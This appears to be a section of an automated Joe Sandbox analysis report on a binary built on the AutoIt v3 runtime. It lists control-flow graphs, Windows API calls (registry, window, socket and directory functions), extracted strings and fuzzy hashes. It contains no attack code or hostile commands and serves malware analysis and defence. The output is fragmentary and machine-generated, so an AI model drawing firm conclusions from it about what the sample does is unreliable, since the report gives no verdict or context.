                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DF2838
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4090791747-0
                                                                                                                        • Opcode ID: 5920427eaef43a07550adce7b5027c61249f7d2e26f3c0910d4ff0e3d854dc7a
                                                                                                                        • Instruction ID: cfc7448dbe4a15d302561da36f0ecd07d6be7bfdc234d7e3e7fe98a08d1afa25
                                                                                                                        • Opcode Fuzzy Hash: 5920427eaef43a07550adce7b5027c61249f7d2e26f3c0910d4ff0e3d854dc7a
                                                                                                                        • Instruction Fuzzy Hash: 02D18B356043059FCB14EF28C891A7ABBE1EF85354F19845DF98A9B2A2DB30DC45CB72

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1572 dec8b7-dec8f1 1573 deccfb-deccff 1572->1573 1574 dec8f7-dec8fa 1572->1574 1576 decd04-decd05 1573->1576 1574->1573 1575 dec900-dec903 1574->1575 1575->1573 1577 dec909-dec912 call decff8 1575->1577 1578 decd06 call dec235 1576->1578 1583 dec914-dec920 1577->1583 1584 dec925-dec92e call ddbe14 1577->1584 1582 decd0b-decd0f 1578->1582 1583->1578 1587 dec934-dec93a 1584->1587 1588 decc61-decc6c call d9d2c0 1584->1588 1589 dec93c-dec93e 1587->1589 1590 dec940 1587->1590 1594 decc6e-decc72 1588->1594 1595 decca9-deccb4 call d9d2c0 1588->1595 1592 dec942-dec94a 1589->1592 1590->1592 1596 deccec-deccf4 1592->1596 1597 dec950-dec967 call dcabf3 1592->1597 1598 decc78 1594->1598 1599 decc74-decc76 1594->1599 1595->1596 1608 deccb6-deccba 1595->1608 1596->1573 1605 dec969-dec96e 1597->1605 1606 dec973-dec97f 1597->1606 1603 decc7a-decc98 call dad6b4 call dd97b6 1598->1603 1599->1603 1624 decc99-decca7 call ddd7e4 1603->1624 1605->1576 1609 dec9ce-dec9f9 call dafa89 1606->1609 1610 dec981-dec98d 1606->1610 1612 deccbc-deccbe 1608->1612 1613 deccc0 1608->1613 1625 dec9fb-deca16 call daac65 1609->1625 1626 deca18-deca1a 1609->1626 1610->1609 1615 dec98f-dec99c call dca8c8 1610->1615 1614 deccc2-deccea call dad6b4 call dd503c call da2570 1612->1614 1613->1614 1614->1624 1623 dec9a1-dec9a6 1615->1623 1623->1609 1630 dec9a8-dec9af 1623->1630 1624->1582 1628 deca1d-deca24 1625->1628 1626->1628 1633 deca26-deca30 1628->1633 1634 deca52-deca59 1628->1634 1636 dec9be-dec9c5 1630->1636 1637 dec9b1-dec9b8 1630->1637 1639 deca32-deca48 call dca25b 1633->1639 1642 decadf-decaec 1634->1642 1643 deca5f-deca66 1634->1643 1636->1609 1644 dec9c7 1636->1644 1637->1636 1641 dec9ba 1637->1641 1654 deca4a-deca50 1639->1654 1641->1636 1645 decaee-decaf8 1642->1645 1646 decafb-decb28 VariantInit call db1970 1642->1646 1643->1642 1649 deca68-deca7b 1643->1649 1644->1609 1645->1646 1658 decb2d-decb30 1646->1658 1659 decb2a-decb2b 1646->1659 1652 deca7c-deca84 1649->1652 1655 deca86-decaa3 VariantClear 1652->1655 1656 decad1-decada 1652->1656 1654->1634 1660 decabc-decacc 1655->1660 1661 decaa5-decab9 SysAllocString 1655->1661 1656->1652 1657 decadc 1656->1657 1657->1642 1663 decb31-decb43 1658->1663 1659->1663 1660->1656 1662 decace 1660->1662 1661->1660 1662->1656 1664 decb47-decb4c 1663->1664 1665 decb4e-decb52 1664->1665 1666 decb8a-decb8c 1664->1666 1669 decb54-decb86 1665->1669 1670 decba1-decba5 1665->1670 1667 decb8e-decb95 1666->1667 1668 decbb4-decbd5 call ddd7e4 call dda6f6 1666->1668 1667->1670 1671 decb97-decb9f 1667->1671 1678 decc41-decc50 VariantClear 1668->1678 1682 decbd7-decbe0 1668->1682 1669->1666 1672 decba6-decbaf call dec235 1670->1672 1671->1672 1672->1678 1680 decc5a-decc5c 1678->1680 1681 decc52-decc55 call dd1693 1678->1681 1680->1582 1681->1680 1684 decbe2-decbef 1682->1684 1685 decc38-decc3f 1684->1685 1686 decbf1-decbf8 1684->1686 1685->1678 1685->1684 1687 decbfa-decc0a 1686->1687 1688 decc26-decc2a 1686->1688 1687->1685 1689 decc0c-decc14 1687->1689 1690 decc2c-decc2e 1688->1690 1691 decc30 1688->1691 1689->1688 1692 decc16-decc1c 1689->1692 1693 decc32-decc33 call dda6f6 1690->1693 1691->1693 1692->1688 1694 decc1e-decc24 1692->1694 1693->1685 1694->1685 1694->1688
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                        • API String ID: 0-572801152
                                                                                                                        • Opcode ID: ed49e4e722f9fa8f292b004c2af084a4099de7ac989b3925b6e185d13d5ea132
                                                                                                                        • Instruction ID: 5c14d362e0d20ee46c7b1b790205d5361cbcf67c8002fa90160cdc90a2b4552d
                                                                                                                        • Opcode Fuzzy Hash: ed49e4e722f9fa8f292b004c2af084a4099de7ac989b3925b6e185d13d5ea132
                                                                                                                        • Instruction Fuzzy Hash: 9FE1AE71A10259AFDF10EFA9C881AAE77B5FF48314F189069F945AB281D7709D42CBB0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1696 debf80-debfe1 call db1970 1699 dec21b-dec21d 1696->1699 1700 debfe7-debfeb 1696->1700 1701 dec21e-dec21f 1699->1701 1700->1699 1702 debff1-debff6 1700->1702 1703 dec224-dec226 1701->1703 1702->1699 1704 debffc-dec00b call ddbe14 1702->1704 1705 dec227 1703->1705 1710 dec158-dec15c 1704->1710 1711 dec011-dec015 1704->1711 1707 dec229 call dec235 1705->1707 1716 dec22e-dec232 1707->1716 1714 dec15e-dec160 1710->1714 1715 dec16d 1710->1715 1712 dec01b 1711->1712 1713 dec017-dec019 1711->1713 1717 dec01d-dec01f 1712->1717 1713->1717 1718 dec16f-dec171 1714->1718 1715->1718 1719 dec033-dec03e 1717->1719 1720 dec021-dec025 1717->1720 1718->1701 1721 dec177-dec17b 1718->1721 1719->1705 1720->1719 1722 dec027-dec031 1720->1722 1723 dec17d-dec17f 1721->1723 1724 dec181 1721->1724 1722->1719 1726 dec043-dec05f 1722->1726 1725 dec183-dec186 1723->1725 1724->1725 1727 dec188-dec18e 1725->1727 1728 dec193-dec197 1725->1728 1733 dec067-dec081 1726->1733 1734 dec061-dec065 1726->1734 1727->1703 1729 dec19d 1728->1729 1730 dec199-dec19b 1728->1730 1732 dec19f-dec1c9 VariantInit VariantClear 1729->1732 1730->1732 1740 dec1cb-dec1cd 1732->1740 1741 dec1e6-dec1ea 1732->1741 1742 dec089 1733->1742 1743 dec083-dec087 1733->1743 1734->1733 1735 dec090-dec0e5 call dafa89 VariantInit call db1a00 1734->1735 1758 dec108-dec10d 1735->1758 1759 dec0e7-dec0f1 1735->1759 1740->1741 1744 dec1cf-dec1e1 call da2570 1740->1744 1745 dec1ec-dec1ee 1741->1745 1746 dec1f0-dec1fe call da2570 1741->1746 1742->1735 1743->1735 1743->1742 1757 dec0fb-dec0fe 1744->1757 1745->1746 1749 dec201-dec219 call dda6f6 VariantClear 1745->1749 1746->1749 1749->1716 1757->1707 1762 dec10f-dec131 1758->1762 1763 dec162-dec16b 1758->1763 1760 dec103-dec106 1759->1760 1761 dec0f3-dec0fa 1759->1761 1760->1757 1761->1757 1766 dec13b-dec13d 1762->1766 1767 dec133-dec139 1762->1767 1763->1757 1768 dec141-dec157 call dda6f6 1766->1768 1767->1757 1768->1710
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                        • Opcode ID: 4e58fefe68e082a0caf14795948b734d19d564f3cca129fe0458dcf847f9794e
                                                                                                                        • Instruction ID: a5e475a74e7166b099023aae5f23696051653ae522c707915d370c741d8e35dc
                                                                                                                        • Opcode Fuzzy Hash: 4e58fefe68e082a0caf14795948b734d19d564f3cca129fe0458dcf847f9794e
                                                                                                                        • Instruction Fuzzy Hash: 2191BC71A10349EBCB24EFA6CC44FAEBBB8EF44710F149119F915AB281D7709946CBB0
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00DAEADA,?,?), ref: 00DAEB27
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00DAEADA,?,?), ref: 00E04B26
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00DAEADA,?,?), ref: 00E04B65
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00DAEADA,?,?), ref: 00E04B94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                        • Opcode ID: 37f04dfc1c977685d48c7921e8e6291a613e6453cff41a13253d39242d08c1d1
                                                                                                                        • Instruction ID: e3882794de7bb37dddb63839555597d9dd139b0efe7579b7a8d09c5203a93fbf
                                                                                                                        • Opcode Fuzzy Hash: 37f04dfc1c977685d48c7921e8e6291a613e6453cff41a13253d39242d08c1d1
                                                                                                                        • Instruction Fuzzy Hash: B8116DB1604218BEEF04AFA4DD86EFE77BCEF04344F005059B606E2091EA709E45DB60
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D92ECB
                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D92EEC
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00D92F00
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00D92F09
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CreateShow
                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                        • Opcode ID: fcf911552d1d01ecc721806c5e9412c3f41b52788fc5cc7d70142223fddf06c5
                                                                                                                        • Instruction ID: 48eefef200cae888eff446bb69960ef57d20fd0f4c03933ecee693a58d41d35f
                                                                                                                        • Opcode Fuzzy Hash: fcf911552d1d01ecc721806c5e9412c3f41b52788fc5cc7d70142223fddf06c5
                                                                                                                        • Instruction Fuzzy Hash: 36F01770A483A07EE7215B63AC08FAB2E7DD7C6F21F01455ABA08B21A0C1610889CAB0
                                                                                                                        APIs
                                                                                                                        • __init_pointers.LIBCMT ref: 00DB87D7
                                                                                                                          • Part of subcall function 00DB1E5A: __initp_misc_winsig.LIBCMT ref: 00DB1E7E
                                                                                                                          • Part of subcall function 00DB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00DB8BE1
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DB8BF5
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DB8C08
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DB8C1B
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DB8C2E
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00DB8C41
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00DB8C54
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00DB8C67
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00DB8C7A
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00DB8C8D
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00DB8CA0
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00DB8CB3
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00DB8CC6
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00DB8CD9
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00DB8CEC
                                                                                                                          • Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00DB8CFF
                                                                                                                        • __mtinitlocks.LIBCMT ref: 00DB87DC
                                                                                                                          • Part of subcall function 00DB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00E4AC68,00000FA0,?,?,00DB87E1,00DB6AFA,00E467D8,00000014), ref: 00DB8AD1
                                                                                                                        • __mtterm.LIBCMT ref: 00DB87E5
                                                                                                                          • Part of subcall function 00DB884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00DB89CF
                                                                                                                          • Part of subcall function 00DB884D: _free.LIBCMT ref: 00DB89D6
                                                                                                                          • Part of subcall function 00DB884D: RtlDeleteCriticalSection.NTDLL(00E4AC68), ref: 00DB89F8
                                                                                                                        • __calloc_crt.LIBCMT ref: 00DB880A
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00DB8833
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2942034483-0
                                                                                                                        • Opcode ID: c66745c9b44761532783ed0271b77cfbe5d70e7ae4980d677ba48a947efdd6b8
                                                                                                                        • Instruction ID: f929edf366445c0002090d1ab61c2ecb77a82d65910af09a51ea00913f046025
                                                                                                                        • Opcode Fuzzy Hash: c66745c9b44761532783ed0271b77cfbe5d70e7ae4980d677ba48a947efdd6b8
                                                                                                                        • Instruction Fuzzy Hash: 50F09036119751DEF2647B39BC07ACA26CCCF06B34B680A2AF467D50D2FF108841E174
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D93B1E: _wcsncpy.LIBCMT ref: 00D93B32
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DD6DBA
                                                                                                                        • GetLastError.KERNEL32 ref: 00DD6DC5
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD6DD9
                                                                                                                        • _wcsrchr.LIBCMT ref: 00DD6DFB
                                                                                                                          • Part of subcall function 00DD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD6E31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3633006590-0
                                                                                                                        • Opcode ID: 553e243c5c96eb71ebf9f36bd83d6249266039fd32d6c9d6fc3b2a0a9172d0b9
                                                                                                                        • Instruction ID: 7033dba8353c91f63f1c0242e4ec614ddb4e885c78efc0bb6684a2a72a382f8c
                                                                                                                        • Opcode Fuzzy Hash: 553e243c5c96eb71ebf9f36bd83d6249266039fd32d6c9d6fc3b2a0a9172d0b9
                                                                                                                        • Instruction Fuzzy Hash: EB2127756413189ADF207BB8EC4AAEA33ACCF11310F244557F021D32E2EB20DE8496B0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DEACD3: inet_addr.WS2_32(00000000), ref: 00DEACF5
                                                                                                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00DE9160
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE916F
                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 00DE918B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3701255441-0
                                                                                                                        • Opcode ID: f487ff5d25345992b2a9c9162c11fb571c91de9a7a9fca92e1fd0e44fb19d907
                                                                                                                        • Instruction ID: 77f4dc9c5a3b4f20ac5a88ea03d3cc44cb9f801c9f9cadacdcb7a91f2ceef320
                                                                                                                        • Opcode Fuzzy Hash: f487ff5d25345992b2a9c9162c11fb571c91de9a7a9fca92e1fd0e44fb19d907
                                                                                                                        • Instruction Fuzzy Hash: 5A21A1312042119FCB00BF69CC99B6EB7ADEF45724F04841AF916AB3D1DB70E8058771
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: dE
                                                                                                                        • API String ID: 0-1919509572
                                                                                                                        • Opcode ID: 1ca16384eedf0f3b7b72c37c549fab7f8b66a26e54134c510ec8b56f9ba5464c
                                                                                                                        • Instruction ID: 64630182d2e725b9ad88db1527169282c3036bbaa9ebc3f11bfb165519a500e9
                                                                                                                        • Opcode Fuzzy Hash: 1ca16384eedf0f3b7b72c37c549fab7f8b66a26e54134c510ec8b56f9ba5464c
                                                                                                                        • Instruction Fuzzy Hash: AAF17D716087419FC710EF25C880B5AB7E5FF88314F14896EF9999B292D730E905CBA2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D934E2,?,00000001), ref: 00D93FCD
                                                                                                                        • _free.LIBCMT ref: 00E03C27
                                                                                                                        • _free.LIBCMT ref: 00E03C6E
                                                                                                                          • Part of subcall function 00D9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E522E8,?,00000000,?,00D93E2E,?,00000000,?,00E2DBF0,00000000,?), ref: 00D9BE8B
                                                                                                                          • Part of subcall function 00D9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D93E2E,?,00000000,?,00E2DBF0,00000000,?,00000002), ref: 00D9BEA7
                                                                                                                          • Part of subcall function 00D9BDF0: __wsplitpath.LIBCMT ref: 00D9BF19
                                                                                                                          • Part of subcall function 00D9BDF0: _wcscpy.LIBCMT ref: 00D9BF31
                                                                                                                          • Part of subcall function 00D9BDF0: _wcscat.LIBCMT ref: 00D9BF46
                                                                                                                          • Part of subcall function 00D9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00D9BF56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
